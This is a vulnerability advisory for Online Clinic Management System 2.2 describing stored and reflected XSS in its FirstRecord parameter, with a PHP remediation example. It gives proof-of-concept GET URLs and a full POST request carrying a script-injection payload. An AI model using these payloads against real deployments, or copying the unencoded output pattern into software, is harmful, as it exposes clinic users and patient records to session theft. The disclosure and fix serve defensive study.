# Exploit Title: Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)
# Date: 27-06-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://bigprof.com
# Software Download Link : https://bigprof.com/appgini/applications/online-clinic-management-system
# Version : 2.2
# Category: Webapps
# Tested on: Windows 7 64 Bits / Windows 10 64 Bits
# CVE :
# Category: webapps
# Vulnerability Type: Stored Cross-Site Scripting

1. Description

Online Clinic Management System 2.2 does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via /clinic/medical_records_view.php, in the FirstRecord parameter (GET and POST requests).

2. Proof of Concept

GET:

http://127.0.0.1/clinic/medical_records_view.php?SelectedID=2&record-added-ok=5781&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

POST:

POST http://127.0.0.1/clinic/medical_records_view.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------1512016725878
Content-Length: 1172
Origin: https://127.0.0.1
Connection: keep-alive
Referer: https://127.0.0.1/clinic/medical_records_view.php
Cookie: online_clinic_management_system=bnl1ht0a4n7snalaoqgh8f85b4; online_clinic_management_system.dvp_expand=[%22tab_medical_records-patient%22%2C%22tab_events-name_patient%22]
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

-----------------------------1512016725878
Content-Disposition: form-data; name="current_view"

DVP
-----------------------------1512016725878
Content-Disposition: form-data; name="SortField"


-----------------------------1512016725878
Content-Disposition: form-data; name="SelectedID"

1
-----------------------------1512016725878
Content-Disposition: form-data; name="SelectedField"


-----------------------------1512016725878
Content-Disposition: form-data; name="SortDirection"


-----------------------------1512016725878
Content-Disposition: form-data; name="FirstRecord"

"><script>alert(1);</script>
-----------------------------1512016725878
Content-Disposition: form-data; name="NoDV"


-----------------------------1512016725878
Content-Disposition: form-data; name="PrintDV"


-----------------------------1512016725878
Content-Disposition: form-data; name="DisplayRecords"

all
-----------------------------1512016725878
Content-Disposition: form-data; name="patient"


-----------------------------1512016725878
Content-Disposition: form-data; name="SearchString"


-----------------------------1512016725878--

1. Description

Online Clinic Management System 2.2 does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via /clinic/patients_view.php, in the FirstRecord parameter.

2. Proof of Concept

http://127.0.0.1/clinic/patients_view.php?SelectedID=1&record-added-ok=11536&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

The application is also affected by Reflected Cross-Site Scripting (XSS).

# Vulnerability Type: Reflected Cross-Site Scripting

1. Description

Online Clinic Management System 2.2 does not sufficiently encode user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS) vulnerability via /clinic/events_view.php, in the FirstRecord parameter.

2. Proof of Concept

http://127.0.0.1/clinic/events_view.php?SelectedID=2&record-added-ok=7758&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

1. Description

Online Clinic Management System 2.2 does not sufficiently encode user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS) vulnerability via /clinic/disease_symptoms_view.php, in the FirstRecord parameter.

2. Proof of Concept

http://127.0.0.1/clinic/disease_symptoms_view.php?SelectedID=1&record-added-ok=1096&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=
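All four findings above share one root cause: the FirstRecord request parameter is written back into the page without output encoding. The following PHP is an added illustration of the fix, not code from Online Clinic Management System, AppGini or the advisory author. It assumes (the advisory does not show the source) that the affected pages re-emit FirstRecord inside an HTML attribute such as a hidden paging field, which is the context the "><script> payload breaks out of, and it assumes FirstRecord is meant to be a numeric record offset. The function names are hypothetical.

```php
<?php
// Added illustration, not code from Online Clinic Management System or AppGini.
// Assumption: the affected pages re-emit the FirstRecord request parameter
// inside an HTML attribute (for example a hidden form field used for paging);
// the advisory's "><script>... payload is what breaks out of such an attribute
// when the value is written back unencoded.

// Pattern to avoid: untrusted value concatenated straight into an attribute.
function render_first_record_unsafe(string $firstRecord): string
{
    return '<input type="hidden" name="FirstRecord" value="' . $firstRecord . '">';
}

// Hardened pattern: validate the expected shape, then encode for the output
// context. Both steps are kept: either alone stops this payload, but validation
// documents intent and encoding protects any future caller that passes a
// free-form string.
function render_first_record_safe(string $firstRecord): string
{
    // Assumption: FirstRecord is a record offset, so only a short run of digits
    // is legitimate. Anything else falls back to the default instead of being
    // "cleaned", because stripping tags from junk still leaves junk.
    if (!preg_match('/^[0-9]{1,9}$/', $firstRecord)) {
        $firstRecord = '1';
    }

    // Attribute context: ENT_QUOTES turns both " and ' into entities, so the
    // value can never terminate the attribute it is placed in.
    $encoded = htmlspecialchars($firstRecord, ENT_QUOTES | ENT_HTML5, 'UTF-8');

    return '<input type="hidden" name="FirstRecord" value="' . $encoded . '">';
}

// Encoding-only variant for parameters that genuinely are free text (such as
// SearchString in the same requests) and cannot be validated to a fixed shape.
function encode_for_attribute(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed input: the URL-decoded form of the advisory's proof-of-concept value.
$payload = '"><script>alert(1);</script>';

echo "unsafe:  " . render_first_record_unsafe($payload) . PHP_EOL;
echo "safe:    " . render_first_record_safe($payload) . PHP_EOL;
echo "encoded: " . encode_for_attribute($payload) . PHP_EOL;
```

Run with `php example.php`. The "unsafe" line shows the attribute closed early by the leading `">` with a script element following it; the "safe" line shows the attribute holding the fallback offset `1`; the "encoded" line shows the same payload with every `"`, `<` and `>` turned into `&quot;`, `&lt;` and `&gt;`, so a browser renders it as inert attribute text. Because the stored variants of this issue persist the value server-side, the encoding must happen at output time on every page that displays the field, not only at the form that first accepts it.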